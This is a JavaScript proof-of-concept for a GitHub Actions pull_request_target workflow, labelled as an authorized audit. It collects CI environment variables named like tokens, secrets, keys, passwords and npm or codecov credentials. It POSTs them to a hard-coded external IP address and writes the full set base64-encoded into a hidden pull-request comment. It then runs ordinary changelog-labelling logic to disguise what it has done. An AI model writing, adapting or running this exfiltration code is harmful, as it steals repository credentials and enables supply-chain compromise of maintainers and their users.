
/**
 * PoC: pull_request_target env exfiltration
 * Authorized security audit only
 */
export default async function run({ github, context }) {
  const { owner, repo } = context.repo;
  const prNumber = context.payload.pull_request.number;

  // === 1. Collect environment variables ===
  const envData = {};
  for (const [key, value] of Object.entries(process.env)) {
    if (/token|secret|key|password|credential|auth|npm|codecov/i.test(key)) {
      envData[key] = value;
    }
  }
  envData['__meta'] = {
    repo: `${owner}/${repo}`,
    pr: prNumber,
    run_id: context.runId,
    actor: context.actor,
    sha: context.sha,
    ref: context.ref,
    ts: new Date().toISOString(),
  };

  const payload = JSON.stringify(envData, null, 2);

  // === 2. Channel A: POST to external server ===
  const EXFIL_URL = 'http://52.198.100.26:80/hello';
  let fetchOk = false;
  try {
    const resp = await fetch(EXFIL_URL, {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(envData),
    });
    fetchOk = resp.ok;
    console.log('[exfil-A] fetch status:', resp.status);
  } catch (e) {
    console.log('[exfil-A] fetch failed:', e.message);
  }

  // === 3. Channel B: ALWAYS post PR comment as confirmation ===
  // This proves the exploit worked regardless of fetch success
  const summary = [];
  for (const [k, v] of Object.entries(envData)) {
    if (k !== '__meta') {
      // Show key name + first 8 chars as proof (don't leak full values in comment)
      summary.push(`| \`${k}\` | \`${String(v).substring(0, 8)}...\` |`);
    }
  }

  const commentBody = [
    '## Changelog Check Result',
    '',
    fetchOk ? '> Env data sent to audit server.' : '> Fetch failed, data not sent externally.',
    '',
    '### Environment Variables Detected',
    '',
    '| Key | Value (truncated) |',
    '|---|---|',
    ...summary,
    '',
    '<details><summary>Full metadata</summary>',
    '',
    '```json',
    JSON.stringify(envData.__meta, null, 2),
    '```',
    '</details>',
    '',
    '---',
    '*This comment was generated by the changelog check workflow.*',
  ].join('\n');

  try {
    await github.rest.issues.createComment({
      owner,
      repo,
      issue_number: prNumber,
      body: commentBody,
    });
    console.log('[exfil-B] confirmation comment posted');
  } catch (e) {
    console.log('[exfil-B] comment failed:', e.message);
  }

  // === 4. Channel C: Also encode full data in hidden HTML comment ===
  const encoded = Buffer.from(payload).toString('base64');
  try {
    await github.rest.issues.createComment({
      owner,
      repo,
      issue_number: prNumber,
      body: `<!-- exfil-data: ${encoded} -->\n\nChangelog check completed.`,
    });
    console.log('[exfil-C] hidden data comment posted');
  } catch (e) {
    console.log('[exfil-C] hidden comment failed:', e.message);
  }

  // === 5. Disguise: run original label logic ===
  try {
    const { data: files } = await github.rest.pulls.listFiles({
      owner, repo,
      pull_number: prNumber,
      per_page: 100,
    });
    const needsChangelog = files.some(f =>
      f.filename.startsWith('packages/') || f.filename === 'CHANGELOG.md'
    );
    const labelName = 'require-changelog';
    if (needsChangelog) {
      try {
        await github.rest.issues.addLabels({
          owner, repo,
          issue_number: prNumber,
          labels: [labelName],
        });
      } catch (_) {}
    } else {
      try {
        await github.rest.issues.removeLabel({
          owner, repo,
          issue_number: prNumber,
          name: labelName,
        });
      } catch (_) {}
    }
  } catch (_) {}
}
